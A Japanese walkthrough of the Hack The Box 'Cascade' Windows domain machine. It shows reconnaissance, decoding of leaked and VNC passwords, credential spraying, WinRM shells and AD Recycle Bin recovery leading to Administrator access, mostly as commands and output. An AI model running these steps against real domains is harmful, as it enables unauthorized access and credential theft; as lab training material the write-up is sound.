目次
偵察
nmapによるスキャンを行います。
PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-02-27 00:20:03Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? syn-ack ttl 127 636/tcp open tcpwrapped syn-ack ttl 127 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack ttl 127 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49157/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49167/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
enum4linuxの結果よりユーザー情報を取得できます。
user:[CascGuest] rid:[0x1f5] user:[arksvc] rid:[0x452] user:[s.smith] rid:[0x453] user:[r.thompson] rid:[0x455] user:[util] rid:[0x457] user:[j.wakefield] rid:[0x45c] user:[s.hickson] rid:[0x461] user:[j.goodhand] rid:[0x462] user:[a.turnbull] rid:[0x464] user:[e.crowe] rid:[0x467] user:[b.hanson] rid:[0x468] user:[d.burman] rid:[0x469] user:[BackupSvc] rid:[0x46a] user:[j.allen] rid:[0x46e] user:[i.croft] rid:[0x46f]
ldapsearchの結果でRyanの出力にBase64でエンコードされたパスワード情報が確認できます。
┌──(kali㉿kali)-[~/htb/cascade] └─$ ldapsearch -H ldap://10.129.22.181 -x -b "DC=cascade,DC=local ---snip--- # Ryan Thompson, Users, UK, cascade.local dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Ryan Thompson sn: Thompson givenName: Ryan distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local instanceType: 4 whenCreated: 20200109193126.0Z whenChanged: 20200323112031.0Z displayName: Ryan Thompson uSNCreated: 24610 memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local uSNChanged: 295010 name: Ryan Thompson objectGUID:: LfpD6qngUkupEy9bFXBBjA== userAccountControl: 66048 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 132247339091081169 lastLogoff: 0 lastLogon: 132247339125713230 pwdLastSet: 132230718862636251 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA== accountExpires: 9223372036854775807 logonCount: 2 sAMAccountName: r.thompson sAMAccountType: 805306368 userPrincipalName: r.thompson@cascade.local objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local dSCorePropagationData: 20200126183918.0Z dSCorePropagationData: 20200119174753.0Z dSCorePropagationData: 20200119174719.0Z dSCorePropagationData: 20200119174508.0Z dSCorePropagationData: 16010101000000.0Z lastLogonTimestamp: 132294360317419816 msDS-SupportedEncryptionTypes: 0 cascadeLegacyPwd: clk0bjVldmE=
デコードします。
┌──(kali㉿kali)-[~/htb/cascade] └─$ echo 'clk0bjVldmE=' | base64 -d rY4n5eva
取得したアカウント情報でSMBを調査します。
┌──(kali㉿kali)-[~/htb/cascade] └─$ crackmapexec smb 10.129.22.181 -u r.thompson -p rY4n5eva --shares SMB 10.129.22.181 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False) SMB 10.129.22.181 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva SMB 10.129.22.181 445 CASC-DC1 [+] Enumerated shares SMB 10.129.22.181 445 CASC-DC1 Share Permissions Remark SMB 10.129.22.181 445 CASC-DC1 ----- ----------- ------ SMB 10.129.22.181 445 CASC-DC1 ADMIN$ Remote Admin SMB 10.129.22.181 445 CASC-DC1 Audit$ SMB 10.129.22.181 445 CASC-DC1 C$ Default share SMB 10.129.22.181 445 CASC-DC1 Data READ SMB 10.129.22.181 445 CASC-DC1 IPC$ Remote IPC SMB 10.129.22.181 445 CASC-DC1 NETLOGON READ Logon server share SMB 10.129.22.181 445 CASC-DC1 print$ READ Printer Drivers SMB 10.129.22.181 445 CASC-DC1 SYSVOL READ Logon server share
上記で確認できたフォルダの内、dataにアクセスします。
いくつかのフォルダがあるので一括取得します。
┌──(kali㉿kali)-[~/htb/cascade]
└─$ smbclient //10.129.22.181/data -U 'cascade/r.thompson'
Password for [CASCADE\r.thompson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 27 12:27:34 2020
.. D 0 Mon Jan 27 12:27:34 2020
Contractors D 0 Mon Jan 13 10:45:11 2020
Finance D 0 Mon Jan 13 10:45:06 2020
IT D 0 Wed Jan 29 03:04:51 2020
Production D 0 Mon Jan 13 10:45:18 2020
Temps D 0 Mon Jan 13 10:45:15 2020
6553343 blocks of size 4096. 1624839 blocks available
smb: \> mask ""
smb: \> resurce ON
resurce: command not found
smb: \> recurce ON
recurce: command not found
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Contractors\*
NT_STATUS_ACCESS_DENIED listing \Finance\*
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Temps\*
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as IT/Email Archives/Meeting_Notes_June_2018.html (3.4 KiloBytes/sec) (average 3.4 KiloBytes/sec)
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log (1.8 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as IT/Logs/DCs/dcdiag.log (6.5 KiloBytes/sec) (average 4.1 KiloBytes/sec)
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as IT/Temp/s.smith/VNC Install.reg (3.6 KiloBytes/sec) (average 4.0 KiloBytes/sec)
smb: \>
取得したデータの中に含まれるファイルよりアカウント情報が確認できます。
┌──(kali㉿kali)-[~/htb/cascade] └─$ find . -type f ./rustscan.txt ./IT/Temp/s.smith/VNC Install.reg ./IT/Email Archives/Meeting_Notes_June_2018.html ./IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log ./IT/Logs/DCs/dcdiag.log ./users.txt ./data ./vnc_enc_pass ./ldap-result
ユーザー名と思われるTempAdminを確認。
┌──(kali㉿kali)-[~/htb/cascade] └─$ cat "./IT/Email Archives/Meeting_Notes_June_2018.html" ---snip--- perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password).
パスワード情報を確認。
┌──(kali㉿kali)-[~/htb/cascade] └─$ cat "./IT/Temp/s.smith/VNC Install.reg" ��Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC] [HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server] "ExtraPorts"="" "QueryTimeout"=dword:0000001e "QueryAcceptOnTimeout"=dword:00000000 "LocalInputPriorityTimeout"=dword:00000003 "LocalInputPriority"=dword:00000000 "BlockRemoteInput"=dword:00000000 "BlockLocalInput"=dword:00000000 "IpAccessControl"="" "RfbPort"=dword:0000170c "HttpPort"=dword:000016a8 "DisconnectAction"=dword:00000000 "AcceptRfbConnections"=dword:00000001 "UseVncAuthentication"=dword:00000001 "UseControlAuthentication"=dword:00000000 "RepeatControlAuthentication"=dword:00000000 "LoopbackOnly"=dword:00000000 "AcceptHttpConnections"=dword:00000001 "LogLevel"=dword:00000000 "EnableFileTransfers"=dword:00000001 "RemoveWallpaper"=dword:00000001 "UseD3D"=dword:00000001 "UseMirrorDriver"=dword:00000001 "EnableUrlParams"=dword:00000001 "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f "AlwaysShared"=dword:00000000 "NeverShared"=dword:00000000 "DisconnectClients"=dword:00000001 "PollingInterval"=dword:000003e8 "AllowLoopback"=dword:00000000 "VideoRecognitionInterval"=dword:00000bb8 "GrabTransparentWindows"=dword:00000001 "SaveLogToAllUsersPath"=dword:00000000 "RunControlInterface"=dword:00000001 "IdleTimeout"=dword:00000000 "VideoClasses"="" "VideoRects"=""
VNCのパスワードは以下の方法で変換します。
- 16進数をBase64に変換
- パスワードをbase64から平文に変換
- vncpassword復号ツールを使用
┌──(kali㉿kali)-[~/htb/cascade]
└─$ echo -n -e '\x6b\xcf\x2a\x4b\x6e\x5a\xca\x0f' | base64
a88qS25ayg8=
┌──(kali㉿kali)-[~/htb/cascade]
└─$ echo "a88qS25ayg8=" | base64 -d > vncpasshash
┌──(kali㉿kali)-[~/htb/cascade]
└─$ cat vncpasshash
k *KnZ
vncpassword複合ツールの取得
┌──(kali㉿kali)-[~/opt]
└─$ git clone https://github.com/jeroennijhof/vncpwd.git
Cloning into 'vncpwd'...
remote: Enumerating objects: 28, done.
remote: Total 28 (delta 0), reused 0 (delta 0), pack-reused 28 (from 1)
Receiving objects: 100% (28/28), 22.15 KiB | 7.38 MiB/s, done.
Resolving deltas: 100% (9/9), done.
┌──(kali㉿kali)-[~/opt]
└─$ cd vncpwd
┌──(kali㉿kali)-[~/opt/vncpwd]
└─$ make
gcc -Wall -g -o vncpwd vncpwd.c d3des.c
d3des.c: In function ‘deskey’:
d3des.c:70:6: warning: old-style function defin
※大量のエラーが出る
┌──(kali㉿kali)-[~/opt/vncpwd]
└─$ ./vncpwd ./vncpasshash Password: sT333ve2
user.txt取得
ここまでで確認できた資格情報より、winrmで有効なものが確認できます。
┌──(kali㉿kali)-[~/htb/cascade] └─$ crackmapexec winrm 10.129.22.181 -u users.txt -p passwords.txt --continue-on-success SMB 10.129.22.181 5985 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 (name:CASC-DC1) (domain:cascade.local) HTTP 10.129.22.181 5985 CASC-DC1 [*] http://10.129.22.181:5985/wsman /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.22.181 5985 CASC-DC1 [-] cascade.local\CascGuest:rY4n5eva /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.22.181 5985 CASC-DC1 [-] cascade.local\CascGuest:sT333ve2 /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.22.181 5985 CASC-DC1 [-] cascade.local\arksvc:rY4n5eva /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.22.181 5985 CASC-DC1 [-] cascade.local\arksvc:sT333ve2 /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.22.181 5985 CASC-DC1 [-] cascade.local\s.smith:rY4n5eva /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.22.181 5985 CASC-DC1 [+] cascade.local\s.smith:sT333ve2 (Pwn3d!)
s.smithでアクセスするとuser.txtが取得できます。
┌──(kali㉿kali)-[~/htb/cascade]
└─$ evil-winrm -i 10.129.22.181 -u s.smith -p 'sT333ve2'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents>
権限昇格
s.smithでAudit$へアクセスします。 DBフォルダにAudit.dbというファイルがあります。
┌──(kali㉿kali)-[~/htb/cascade]
└─$ smbclient //10.129.22.181/Audit$ -U 'cascade/s.smith'
Password for [CASCADE\s.smith]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jan 30 03:01:26 2020
.. D 0 Thu Jan 30 03:01:26 2020
CascAudit.exe An 13312 Wed Jan 29 06:46:51 2020
CascCrypto.dll An 12288 Thu Jan 30 03:00:20 2020
DB D 0 Wed Jan 29 06:40:59 2020
RunAudit.bat A 45 Wed Jan 29 08:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 15:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 15:38:38 2019
x64 D 0 Mon Jan 27 07:25:27 2020
x86 D 0 Mon Jan 27 07:25:27 2020
6553343 blocks of size 4096. 1624773 blocks available
smb: \> cd DB
smb: \DB\> ls
. D 0 Wed Jan 29 06:40:59 2020
.. D 0 Wed Jan 29 06:40:59 2020
Audit.db An 24576 Wed Jan 29 06:39:24 2020
6553343 blocks of size 4096. 1625031 blocks available
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (22.2 KiloBytes/sec) (average 22.2 KiloBytes/sec)
smb: \DB\>
取得したファイルを調査します。対象のファイルはSQLiteのものでした。
ファイルからArkSvcのアカウント情報が確認できました。
┌──(kali㉿kali)-[~/htb/cascade]
└─$ file Audit.db
Audit.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 60, database pages 6, 1st free page 6, free pages 1, cookie 0x4b, schema 4, UTF-8, version-valid-for 60
┌──(kali㉿kali)-[~/htb/cascade]
└─$ sqlite3
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> attach "Audit.db" as db1;
sqlite> .tables
db1.DeletedUserAudit db1.Ldap db1.Misc
sqlite> select * from db1.ldap
...> ;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> select * from db1.ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite>
このパスワードはBase64でエンコードされているようですが、デコードしても内容がわかりません。
┌──(kali㉿kali)-[~] └─$ echo 'BQO5l5Kj9MdErXx6Q6AGOw==' | base64 -d ������D�|zC�;
SMBより取得したCascCrypt.dllをdnSpyで調査します。
IVの情報が確認できます。
CascAudit.exeもdnSpyで調査します。
このexeではdll内の関数に暗号化するテキストとキーを渡して実行しています。
また、exeの中でAES暗号に必要な要素が確認できます。
Key・・・引数の文字列
IV(初期化ベクトル)・・・dll内で定義
Mode(暗号モード)・・・exe内に記載
上記情報をもとに復号します。
上記のパスワードを使用してArkSvcでのwinrmでアクセスします。
arksvcはAD Recycle Binに所属しています。
*Evil-WinRM* PS C:\Users\arksvc\Documents> net user arksvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 4:18:20 PM
Password expires Never
Password changeable 1/9/2020 4:18:20 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/29/2020 9:05:40 PM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\arksvc\Documents>
AD Recycle Binは、Active Directoryの削除されたオブジェクトを回復できます。
実行するとTempAdminのパスワードが確認できます。
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
CN : CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
codePage : 0
countryCode : 0
Created : 1/9/2020 7:30:19 PM
createTimeStamp : 1/9/2020 7:30:19 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM, 1/9/2020 7:30:19 PM, 1/1/1601 12:04:17 AM}
instanceType : 4
isCriticalSystemObject : False
isDeleted : True
LastKnownParent : OU=Computers,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
localPolicyFlags : 0
logonCount : 0
Modified : 1/28/2020 6:08:35 PM
modifyTimeStamp : 1/28/2020 6:08:35 PM
msDS-LastKnownRDN : CASC-WS1
Name : CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : computer
ObjectGUID : 6d97daa4-2e82-4946-a11e-f91fa18bfabe
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1108
primaryGroupID : 515
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132230718192147073
sAMAccountName : CASC-WS1$
sDRightsEffective : 0
userAccountControl : 4128
uSNChanged : 245849
uSNCreated : 24603
whenChanged : 1/28/2020 6:08:35 PM
whenCreated : 1/9/2020 7:30:19 PM
CanonicalName : cascade.local/Deleted Objects/Scheduled Tasks
DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
CN : Scheduled Tasks
DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
Created : 1/13/2020 5:21:53 PM
createTimeStamp : 1/13/2020 5:21:53 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=Scheduled Tasks\0ADEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/17/2020 9:35:46 PM, 1/17/2020 9:32:57 PM, 1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM...}
groupType : -2147483644
instanceType : 4
isDeleted : True
LastKnownParent : OU=Groups,OU=UK,DC=cascade,DC=local
Modified : 1/28/2020 6:07:55 PM
modifyTimeStamp : 1/28/2020 6:07:55 PM
msDS-LastKnownRDN : Scheduled Tasks
Name : Scheduled Tasks
DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : group
ObjectGUID : 13375728-5ddb-4137-b8b8-b9041d1d3fd2
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1131
ProtectedFromAccidentalDeletion : False
sAMAccountName : Scheduled Tasks
sDRightsEffective : 0
uSNChanged : 245848
uSNCreated : 114790
whenChanged : 1/28/2020 6:07:55 PM
whenCreated : 1/13/2020 5:21:53 PM
CanonicalName : cascade.local/Deleted Objects/{A403B701-A528-4685-A816-FDEE32BDDCBA}
DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
CN : {A403B701-A528-4685-A816-FDEE32BDDCBA}
DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
Created : 1/26/2020 2:34:30 AM
createTimeStamp : 1/26/2020 2:34:30 AM
Deleted : True
Description :
DisplayName : Block Potato
DistinguishedName : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/1/1601 12:00:00 AM}
flags : 0
gPCFileSysPath : \\cascade.local\SysVol\cascade.local\Policies\{A403B701-A528-4685-A816-FDEE32BDDCBA}
gPCFunctionalityVersion : 2
gPCMachineExtensionNames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1D-2488-11D1-A28C-00C04FB94F17}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1D-2488-11D1-A28C-00C04FB94F17}]
instanceType : 4
isDeleted : True
LastKnownParent : CN=Policies,CN=System,DC=cascade,DC=local
Modified : 1/26/2020 2:40:52 AM
modifyTimeStamp : 1/26/2020 2:40:52 AM
msDS-LastKnownRDN : {A403B701-A528-4685-A816-FDEE32BDDCBA}
Name : {A403B701-A528-4685-A816-FDEE32BDDCBA}
DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : groupPolicyContainer
ObjectGUID : ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
ProtectedFromAccidentalDeletion : False
sDRightsEffective : 0
showInAdvancedViewOnly : True
uSNChanged : 196701
uSNCreated : 196688
versionNumber : 2
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:30 AM
CanonicalName : cascade.local/Deleted Objects/Machine
DEL:93c23674-e411-400b-bb9f-c0340bda5a34
CN : Machine
DEL:93c23674-e411-400b-bb9f-c0340bda5a34
Created : 1/26/2020 2:34:31 AM
createTimeStamp : 1/26/2020 2:34:31 AM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=Machine\0ADEL:93c23674-e411-400b-bb9f-c0340bda5a34,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/1/1601 12:00:00 AM}
instanceType : 4
isDeleted : True
LastKnownParent : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Modified : 1/26/2020 2:40:52 AM
modifyTimeStamp : 1/26/2020 2:40:52 AM
msDS-LastKnownRDN : Machine
Name : Machine
DEL:93c23674-e411-400b-bb9f-c0340bda5a34
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : container
ObjectGUID : 93c23674-e411-400b-bb9f-c0340bda5a34
ProtectedFromAccidentalDeletion : False
sDRightsEffective : 0
showInAdvancedViewOnly : True
uSNChanged : 196699
uSNCreated : 196689
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:31 AM
CanonicalName : cascade.local/Deleted Objects/User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
CN : User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
Created : 1/26/2020 2:34:31 AM
createTimeStamp : 1/26/2020 2:34:31 AM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/1/1601 12:00:00 AM}
instanceType : 4
isDeleted : True
LastKnownParent : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Modified : 1/26/2020 2:40:52 AM
modifyTimeStamp : 1/26/2020 2:40:52 AM
msDS-LastKnownRDN : User
Name : User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : container
ObjectGUID : 746385f2-e3a0-4252-b83a-5a206da0ed88
ProtectedFromAccidentalDeletion : False
sDRightsEffective : 0
showInAdvancedViewOnly : True
uSNChanged : 196700
uSNCreated : 196690
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:31 AM
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : TempAdmin@cascade.local
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
Base64デコードします
┌──(kali㉿kali)-[~/htb/cascade] └─$ echo 'YmFDVDNyMWFOMDBkbGVz' | base64 --decode baCT3r1aN00dles ┌──(kali㉿kali)-[~/htb/cascade] └─$
上記のパスワードはAdministratorのものです。
┌──(kali㉿kali)-[~/htb/cascade]
└─$ crackmapexec smb 10.129.41.255 -u users.txt -p baCT3r1aN00dles
SMB 10.129.41.255 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\CascGuest:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\arksvc:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\s.smith:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\r.thompson:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\util:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\j.wakefield:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\s.hickson:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\j.goodhand:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\a.turnbull:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\e.crowe:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\b.hanson:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\d.burman:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\BackupSvc:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\j.allen:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\i.croft:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [-] cascade.local\TedAdmin:baCT3r1aN00dles STATUS_LOGON_FAILURE
SMB 10.129.41.255 445 CASC-DC1 [+] cascade.local\administrator:baCT3r1aN00dles (Pwn3d!)
上記のパスワードでアクセスすrとSYSTEM権限が取得できます。
